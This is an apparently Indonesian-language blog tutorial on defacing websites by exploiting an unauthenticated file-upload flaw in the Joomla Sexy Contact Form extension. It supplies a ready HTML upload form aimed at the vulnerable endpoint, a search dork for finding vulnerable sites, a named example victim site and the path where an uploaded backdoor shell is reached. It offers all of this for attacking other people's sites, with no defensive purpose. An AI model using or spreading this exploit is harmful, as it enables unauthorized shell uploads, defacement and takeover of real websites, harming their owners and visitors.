Holla Semuanya ^w^ Kali ini Saya akan Membahas Tutorial Cara Deface Dengan Exploit Joomla Sexy Contact Form CSRF File Upload Vul...

Holla Semuanya ^w^
Kali ini Saya akan Membahas Tutorial Cara Deface Dengan Exploit Joomla Sexy Contact Form CSRF File Upload Vulnerability ^_^
Ehh iya ~ Teknik ini Lagi Populer loh :D
Banyak Deface Sekarang yang Menggunakan Teknik ini :D
Heheh Oke Langsung Saja Lah :D
Bahan2nya :
1. Script Cross Site Request Forgery (CSRF) :
<form method="POST" action="http://www.Frieskavers.co.Li/components/com_sexycontactform/fileupload/index.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
Copy Paste Script Di Atas ke Notepad ~ Save as .html
*Yang Berwarna Merah Ganti Dengan Target Kamu* ^_^
2. Shell backd00r Tentunya ^_^
Oke Langsung Aja Cara Mainnya ~
Cari Dulu Targetnya Dengan Dork Berikut ^_^
inurl:/com_sexycontactform/ ~ com_sexycontactform/ site:gr
Bisa Di Kembangkan Lagi Dorknya ^_^
Sekarang Exploitnya :
components/com_sexycontactform/fileupload/index.php
Vulnerability Check :
Setelah itu Copy Link Target Ke Script CSRF yang Tadi Sudah Kalian Buat ^_^
Contoh Target Saya ini ~
http://cookmeup.gr/components/com_sexycontactform/fileupload/index.php
Jadinya Di Script CSRF Seperti ini :
<form method="POST" action="http://cookmeup.gr/components/com_sexycontactform/fileupload/index.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
Ngerti Kan :D ?
Kalau ga Ngerti Lihat Gambar ini ~
Kalau Sudah, Buka Script CSRF tadi Lewat Browser Kamu ^_^
Lalu Upload Shell Kamu :D
Kalau Berhasil Nanti Akan Muncul Nama Shell Kalian Seperti ini :D
Nah Sekarang Shell Acces nya Di Sini Kakak ^_^
Target.co.Li/components/com_sexycontactform/fileupload/files/YourShell.php
Jadinya Seperti ini :D
http://cookmeup.gr/components/com_sexycontactform/fileupload/files/frieskavers.php
Nah Habis itu Terserah Kalian Mau Diapain Tuh hehehee :v /
Yasudah DeCh Semoga Bermamfaat yaCh ^_^
COMMENTS